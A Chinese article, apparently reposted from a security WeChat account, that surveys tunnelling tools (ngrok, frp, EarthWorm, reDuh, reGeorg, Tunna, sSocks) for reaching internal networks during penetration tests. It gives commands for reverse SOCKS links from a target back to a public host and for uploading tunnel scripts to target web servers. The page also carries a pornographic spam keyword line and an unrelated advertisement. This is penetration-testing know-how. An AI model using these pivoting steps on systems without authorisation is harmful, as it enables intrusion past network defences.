日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

本文轉(zhuǎn)載自微信公眾號「Bypass 」，作者Bypass 。轉(zhuǎn)載本文請聯(lián)系Bypass公眾號。

公司主營業(yè)務(wù)：網(wǎng)站設(shè)計、成都網(wǎng)站制作、移動網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實現(xiàn)互聯(lián)網(wǎng)宣傳，提高企業(yè)的競爭能力。創(chuàng)新互聯(lián)建站是一支青春激揚、勤奮敬業(yè)、活力青春激揚、勤奮敬業(yè)、活力澎湃、和諧高效的團隊。公司秉承以“開放、自由、嚴謹、自律”為核心的企業(yè)文化，感謝他們對我們的高要求，感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn)，讓我們激情的團隊有機會用頭腦與智慧不斷的給客戶帶來驚喜。創(chuàng)新互聯(lián)建站推出寶山免費做網(wǎng)站回饋大家。

在滲透過程中，我們需要快速實現(xiàn)內(nèi)網(wǎng)穿透，從而繞過網(wǎng)絡(luò)訪問限制，直接從外網(wǎng)來訪問內(nèi)網(wǎng)。今天，我們來推薦幾款非常好用的內(nèi)網(wǎng)穿透工具，如有其它推薦，歡迎補充和指正。

1、ngrok

ngrok 是一個反向代理，通過在公共的端點和本地運行的 Web 服務(wù)器之間建立一個安全的通道。

官網(wǎng)地址：

 
 
 
 

  
  
  
  
https://ngrok.com 
 
 
 
 

使用步驟：

(1)進入ngrok官網(wǎng)注冊賬號，并下載ngrok。

(2)在目標機器上，填寫授權(quán)碼，運行ngrok。

 
 
 
 

  
  
  
  
./ngrok authtoken 授權(quán)碼 
 
 
 
 

(3)將HTTP隧道轉(zhuǎn)發(fā)到本地端口80，如下圖，通過外網(wǎng)域名即可訪問到本地80端口。

 
 
 
 

  
  
  
  
./ngrok http 80 
 
 
 
 

2、frp

frp 是一個高性能的反向代理應(yīng)用，可以幫助您輕松地進行內(nèi)網(wǎng)穿透，對外網(wǎng)提供服務(wù)，支持 tcp, http, https 等協(xié)議類型，并且 web 服務(wù)支持根據(jù)域名進行路由轉(zhuǎn)發(fā)。

git項目地址：

 
 
 
 

  
  
  
  
https://github.com/fatedier/frp 
 
 
 
 

使用步驟：

(1)將 frps 及 frps.ini 放到有公網(wǎng) IP 的機器上，修改frps.ini文件，配置一個名為ssh的反向代理：

 
 
 
 

  
  
  
  
# frps.ini 
  
  
  
  
[common] 
  
  
  
  
bind_port = 7000 
  
  
  
  
 
  
  
  
  
[ssh] 
  
  
  
  
listen_port=6000 
  
  
  
  
auth_token=123 
 
 
 
 

(2)啟動frps：

 
 
 
 

  
  
  
  
./frps -c ./frps.ini 
 
 
 
 

(3)將 frpc 及 frpc.ini 放到處于內(nèi)網(wǎng)環(huán)境的機器上，修改 frpc.ini 文件，設(shè)置 frps 所在服務(wù)器的 IP 為 x.x.x.x：

 
 
 
 

  
  
  
  
# frpc.ini 
  
  
  
  
[common] 
  
  
  
  
server_addr = 192.168.172.131 
  
  
  
  
server_port = 7000 
  
  
  
  
auth_token =123 
  
  
  
  
 
  
  
  
  
[ssh] 
  
  
  
  
type = tcp 
  
  
  
  
local_ip = 127.0.0.1 
  
  
  
  
local_port = 22 
  
  
  
  
remote_port = 6000 
 
 
 
 

(4)啟動frpc：

 
 
 
 

  
  
  
  
./frpc -c ./frpc.ini 
 
 
 
 

(5)通過ssh訪問內(nèi)網(wǎng)服務(wù)器，假設(shè)用戶名為test：

 
 
 
 

  
  
  
  
ssh -p 6000 test@x.x.x.x 
 
 
 
 

3、Sunny-Ngrok

一條命令解決的外網(wǎng)訪問內(nèi)網(wǎng)問題，無需任何配置，一條命令讓外網(wǎng)訪問您的內(nèi)網(wǎng)不再是距離。Ngrok客戶端，支持Windows、Linux、Mac，提供python、PHP等版本。

官網(wǎng)地址：

 
 
 
 

  
  
  
  
https://www.ngrok.cc 
 
 
 
 

使用步驟：

(1) 開通http隧道，設(shè)置隧道協(xié)議、本地端口等信息。

(2)通過隧道id啟動隧道。

(3)在公網(wǎng)上訪問域名，即可訪問到內(nèi)網(wǎng)的網(wǎng)站。

4、Natapp

基于ngrok的內(nèi)網(wǎng)映射工具，免費版本提供http,tcp,udp全隧道穿透、隨機域名/隨機TCP,UDP端口、不定時強制更換域名/端口和自定義本地端口。

下載地址：

 
 
 
 

  
  
  
  
https://natapp.cn 
 
 
 
 

(1)購買隧道，設(shè)置隧道協(xié)議和本地端口。

(2)下載客戶端，到目標主機，運行natapp。

(3)將natapp分配的網(wǎng)址復(fù)制下來，在瀏覽器中訪問，可以看到內(nèi)網(wǎng)穿透成功了!

5、Earthworm 內(nèi)網(wǎng)穿透

EW 是一套便攜式的網(wǎng)絡(luò)穿透工具，具有 SOCKS v5服務(wù)架設(shè)和端口轉(zhuǎn)發(fā)兩大核心功能，可在復(fù)雜網(wǎng)絡(luò)環(huán)境下完成網(wǎng)絡(luò)穿透。

支持Windows、Linux、MacOS、Arm-Linux。

項目地址：

 
 
 
 

  
  
  
  
http://rootkiter.com/EarthWorm 
 
 
 
 

使用方法：

(1)正向 SOCKS v5 服務(wù)器，適用于目標網(wǎng)絡(luò)邊界存在公網(wǎng)IP且可任意開監(jiān)聽端口。

 
 
 
 

  
  
  
  
./ew -s ssocksd -l 1080 
 
 
 
 

(2)反彈SOCKS v5 服務(wù)器，適用于目標網(wǎng)絡(luò)邊界不存在公網(wǎng) IP，需要通過反彈方式創(chuàng)建 socks 代理

 
 
 
 

  
  
  
  
a) 先在一臺具有公網(wǎng) ip 的主機A上運行以下命令： 
  
  
  
  
 ./ew -s rcsocks -l 1080 -e 8888 
  
  
  
  
 
  
  
  
  
  b) 在目標主機B上啟動 SOCKS v5 服務(wù) 并反彈到公網(wǎng)主機的 8888端口 
  
  
  
  
  ./ew -s rssocks -d 1.1.1.1 -e 8888 
 
 
 
 

(3)多級級聯(lián)，適用于多層級的復(fù)雜網(wǎng)絡(luò)環(huán)境，將內(nèi)網(wǎng)深層的服務(wù)轉(zhuǎn)發(fā)到外網(wǎng)。

 
 
 
 

  
  
  
  
## 二級級聯(lián)測試用例 
  
  
  
  
 
  
  
  
  
# 方式一：利用lcx_tran 
  
  
  
  
 $ ./ew -s ssocksd  -l 9999 
  
  
  
  
 $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 
  
  
  
  
 
  
  
  
  
# 方式二： 
  
  
  
  
 $ ./ew -s lcx_listen -l 1080 -e 8888 
  
  
  
  
 $ ./ew -s ssocksd    -l 9999 
  
  
  
  
 $ ./ew -s lcx_slave  -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 
  
  
  
  
 
  
  
  
  
## 三級級聯(lián)測試用例 
  
  
  
  
 
  
  
  
  
  $ ./ew -s rcsocks -l 1080 -e 8888 
  
  
  
  
  $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 
  
  
  
  
  $ ./ew -s lcx_listen -l 9999 -e 7777 
  
  
  
  
  $ ./ew -s rssocks -d 127.0.0.1 -e 7777 
 
 
 
 

6、reDuh

ReDuh 是一個通過 HTTP 協(xié)議建立隧道傳輸各種其他數(shù)據(jù)的工具，通過在服務(wù)器上傳JSP/PHP/ASP腳本，就可以輕易地連接到服務(wù)器后面的主機。

github項目地址：

 
 
 
 

  
  
  
  
https://github.com/sensepost/reDuh 
 
 
 
 

(1)上傳服務(wù)端jsp腳本到目標機器

(2)使用reDuh客戶端連接服務(wù)端腳本上傳后的地址。

 
 
 
 

  
  
  
  
java -jar reDuhClient.jar http://192.168.172.1/reDuh.jsp 
 
 
 
 

7、reGeorg

reGeorg是reDuh的繼承者,利用了會話層的socks5協(xié)議,結(jié)合Proxifier使用效率會更高。

下載地址：

 
 
 
 

  
  
  
  
https://github.com/sensepost/reGeorg 
 
 
 
 

使用方法：

(1)1、將 tunnel腳本(aspx | ashx | jsp | php)上傳到Web服務(wù)器，訪問顯示“Georg says, ‘All seems fine’“，表示腳本運行正常。

(2)在攻擊者機器上，啟動reGeorgSocksProxy.py，監(jiān)聽9999端口，看到 Checking if Georg is ready，確認正常運行。

8、Tunna

Tunna是一款神奇的工具，它可以通過HTTP封裝隧道通信任何TCP，以及用于繞過防火墻環(huán)境中的網(wǎng)絡(luò)限制。

github項目地址：

 
 
 
 

  
  
  
  
https://github.com/SECFORCE/Tunna 
 
 
 
 

9、sSocks

sSocks是一個socks代理工具套裝，可用來開啟socks代理服務(wù)，支持socks5驗證，支持IPV6和UDP，并提供反向socks代理服務(wù)，即將遠程計算機作為socks代理服務(wù)端，反彈回本地，極大方便內(nèi)網(wǎng)的滲透測試。

下載地址：

 
 
 
 

  
  
  
  
http://sourceforge.net/projects/ssocks/ 
 
 
 
 

使用方法：

(1)正向代理

 
 
 
 

  
  
  
  
./ssocksd --bind 192.168.172.131 --port 1234 
 
 
 
 

(2)反向代理

 
 
 
 

  
  
  
  
## 監(jiān)聽6020端口轉(zhuǎn)發(fā)到6010 
  
  
  
  
./rcsocks -l 6020 -p 6010 -vv 
  
  
  
  
 
  
  
  
  
## 反向連接代理主機6010端口 
  
  
  
  
./rssocks -s 192.168.172.131:6010 -vv 
 
 
 
 

網(wǎng)站名稱：好用的內(nèi)網(wǎng)穿透工具合集
當前網(wǎng)址：http://www.5511xx.com/article/dpioogj.html